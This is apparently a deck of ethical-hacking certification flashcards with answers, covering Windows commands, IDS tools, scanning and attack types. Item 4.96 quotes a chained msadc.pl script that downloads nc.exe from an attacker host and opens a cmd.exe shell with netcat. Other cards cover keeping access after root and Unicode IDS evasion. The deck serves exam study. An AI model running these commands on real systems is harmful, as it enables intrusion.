Day 4 76-114 Flashcards
4.76 Which command would launch the Computer Management console on a Windows computer? A. gpedit B. ncpa.cpl C. services.msc D. compmgmt.msc
D. compmgmt.msc Try running compmgmt.msc from your command prompt! (on a Windows machine, of course)
4.77 Which Windows command lists all the shares you have access to? A. NET CONFIG B. NET VIEW C. NET USE D. NET FILE
B. NET VIEW Again, try running this command from a Windows machine! If nothing shows up, then you don’t have access to any shares at the moment.
4.78 When you return to your desk after a lunch break, you notice a strange email in your inbox. The sender is someone you did business with recently, but the subject line has strange characters in it. What should you do? A. Delete the email and pretend nothing happened B. Reply to the sender and ask them for more information about the message contents C. Forward the message to your supervisor and ask for his opinion on how to handle it D. Forward the message to your security response team and delete the message from your computer
D. Forward the message to your security response team and delete the message from your computer
4.79 You want to ensure your machines are compliant with the security policy. Which type of tool would you most likely use? A. Port scanner B. Vulnerability scanner C. Protocol analyzer D. Intrusion Detection System
B. Vulnerability scanner Both the port scanner and the vulnerability scanner will show you which ports are open. The vuln scanner, however, will show you much more, including which user accounts have weak or missing passwords, which patches are missing, which machines have old or outdated antivirus signatures, and a variety of other weaknesses.
4.80 Which protocol is specifically designed to send event messages? A. SMS B. Syslog C. SNMP D. ICMP
B. Syslog
4.81 Which command-line utility lets you scan through text files and find the regular expressions you define? In other words, which one lets you do a “search” for “keywords” in text files? A. Notepad B. Grep C. MS Excel D. Relational database
B. Grep
4.82 You have two machines. Snort is installed on 192.168.0.99. The other machine is a Syslog server with the IP 192.168.0.150. You do a SYN scan on the network, but the Syslog server isn’t getting the alert message from Snort. You run Wireshark to see if the messages are being sent to the Syslog server. Which Wireshark filter will show the messages from the Snort machine to the Syslog machine? A. tcp.srcport==514 && ip.src==192.168.0.99 B. tcp.srcport==514 && ip.src==192.168.150 C. tcp.dstport==514 && ip.dst==192.168.0.0/16 D. tcp.dstport==514 && ip.dst==192.168.0.150
D. tcp.dstport==514 && ip.dst==192.168.0.150
4.83 A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and another is a binary file named “nc”. The FTP server’s access logs show that the anonymous user account logged in to the server, uploaded the files, extracted the contents of the tarball, and ran the script using a function provided by the FTP server’s software. The ps command shows that the nc file is running as a process, and the netstat command shows the nc process is listening on a network port. What kind of vulnerability must be present to make this remote attack possible? A. Directory traversal B. Brute force login C. File system permissions D. Privilege escalation
D. Privilege escalation
4.84 From your computer you try to ping a server on the network. You know it’s up and running, but you don’t get any response from your ping attempts. Why could this be? A. The ARP is disabled on the target server B. ICMP could be disabled on the target server C. TCP/IP doesn’t support ICMP D. You need to run the ping command with root privileges
B. ICMP could be disabled on the target server
4.85 Which could help determine the attack surface of your company? A. Running a network scan to detect network services in the corporate DMZ B. Using configuration management to determine when and where to apply security patches C. Reviewing the need for a security clearance for each employee D. Training employees on the security policy regarding social engineering
A. Running a network scan to detect network services in the corporate DMZ
4.86 Your IDS captured some traffic that is possibly malicious. Which type of tool can help you determine if it really was malicious, or if it was just a false positive? A. Vulnerability scanner B. Network sniffer C. Intrusion Prevention System D. Protocol analyzer
D. Protocol analyzer
4.87 After doing a pen-test, you need to restore systems to a pre-test state. Which of these would NOT be included in this end-step? I. Removing all files uploaded on the system II. Cleaning all registry entries III. Mapping of network state IV. Removing all tools and maintaining backdoor for reporting A. III B. IV C. III and IV D. All should be included
B. IV
4.88 During an audit of IT processes, you find that there are no documented security procedures. What should you do in this event? A. Terminate the audit B. Create a procedures document C. Conduct compliance testing D. Identify and evaluate existing practices
D. Identify and evaluate existing practices
4.89 Which of the following is an extremely common IDS evasion technique in the web world? A. Spyware B. Port knocking C. Unicode characters D. Subnetting
C. Unicode characters Unicode is an international encoding standard for use with different languages and scripts, by which each letter, digit, or symbol is assigned a unique numeric value that applies across different platforms and programs. An IDS can be evaded by obfuscating or encoding the attack payload in a way that the target computer will reverse but the IDS will not. An adversary using Unicode characters could encode attack packets that an IDS would not recognize but that an IIS web server would decode, so the attack reaches the server unnoticed.
4.90 Which tool could be used for passive operating-system fingerprinting? A. nmap B. ping C. tcpdump D. tracert
C. tcpdump While nmap can certainly do OS fingerprinting, it is considered active because you send traffic to the target. Tcpdump, on the other hand, is a sniffer, and by observing differences in the traffic you capture, you can determine the OS that sent the traffic. Tcpdump is passive as it does not send traffic to the target.
4.91 Which type of tool would allow you to monitor all network traffic for malicious behavior, and send you an alert when it finds some? A. Firewall B. Proxy C. Network-based IDS D. Host-based IDS
C. Network-based IDS
4.92 A large and well-organized hacking group will discover vulnerabilities but keep them quiet and hold on to them for later use. If one of these groups were to exploit and utilize several different vulnerabilities against you at once, what would this be considered? A. no-day B. Zero-sum C. Zero-day D. Zero-hour
C. Zero-day A Zero-Day attack exploits a previously unknown vulnerability.
4.93 A covert channel is a channel that... A. Transfers information over or within a computer system or network that is outside of the security policy B. Transfers information over or within a computer system or network that is encrypted C. Transfers information via a communication path within a computer system or network for transfer of data D. Transfers information over or within a computer system or network that is within the security policy
A. Transfers information over or within a computer system or network that is outside of the security policy
4.94 You’ve successfully gained root access to a remote server. What is the first thing you should do so that you continue to maintain access to this server? A. Create a user account B. Download and install Netcat C. Disable IPTables D. Disable Key Services
A. Create a user account
4.95 Which of these is a proxy tool that will let you intercept, test, and analyze your own web traffic in order to help you find vulnerabilities in web apps? A. Proxychains B. Dimitry C. Maskgen D. Burpsuite
D. Burpsuite Burp Suite is a Java application that can be used to secure or penetrate web applications. The suite consists of different tools, such as a proxy server, a web spider, an intruder, and a repeater.
4.96 A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester comes across a Perl script that runs the following msadc functions: system("perl msadc.pl -h $host -c \"echo open $your >testfile\""); system("perl msadc.pl -h $host -c \"echo $pass>>testfile\""); system("perl msadc.pl -h $host -c \"echo bin>>testfile\""); system("perl msadc.pl -h $host -c \"echo get nc.exe>>testfile\""); system("perl msadc.pl -h $host -c \"echo get hacked.html>>testfile\""); system("perl msadc.pl -h $host -c \"echo quit>>testfile\""); system("perl msadc.pl -h $host -c \"ftp -s:testfile\""); $0=; print "Opening\n"; system("perl msadc.pl -h $host -c \"nc -I -p $port -e cmd.exe\""); Which exploit is indicated by this script? A. A buffer overflow exploit B. A chained exploit C. A SQL injection exploit D. A denial of service exploit
B. A chained exploit
4.97 You implement a blacklist for known-malicious IP addresses out on the internet. Immediately after this you get an alert that one of your PCs is connected to one of these blacklisted IPs, which is a known C2 (command-and-control) server. You now need to get a rough idea of how severe this situation is, so which of these should you analyze? A. The IDS log B. Event logs on the Domain Controller (DC) C. Internet Firewall/Proxy log D. Event logs on the PC
D. Event logs on the PC The IDS only started logging these packets when you implemented the blacklist, so that won’t be enough info. To find out things like which program/process is causing this traffic, when it was installed, etc., you should look at the event logs on the PC itself.
4.98 You’re experiencing slow network traffic, so you’ve decided to start monitoring all internet traffic. Legally speaking, what could cause a problem here? A. Not informing the employees that they are going to be monitored could be an invasion of privacy. B. The network could still experience traffic slowdowns. C. You would be telling employees who the boss is. D. All of the employees would stop normal work activities.
A. Not informing the employees that they are going to be monitored could be an invasion of privacy.
4.99 Your company has many private IPs and a range of public IPs. Mary in the IT department monitors network traffic and finds that a large number of machines in both IP ranges are sending traffic to a single IP address on the internet that is blacklisted. It turns out that these company machines have been compromised. Which type of attack is taking place here? A. Advanced Persistent Threat B. Rootkit attack C. Botnet attack D. Spear Phishing attack
C. Botnet attack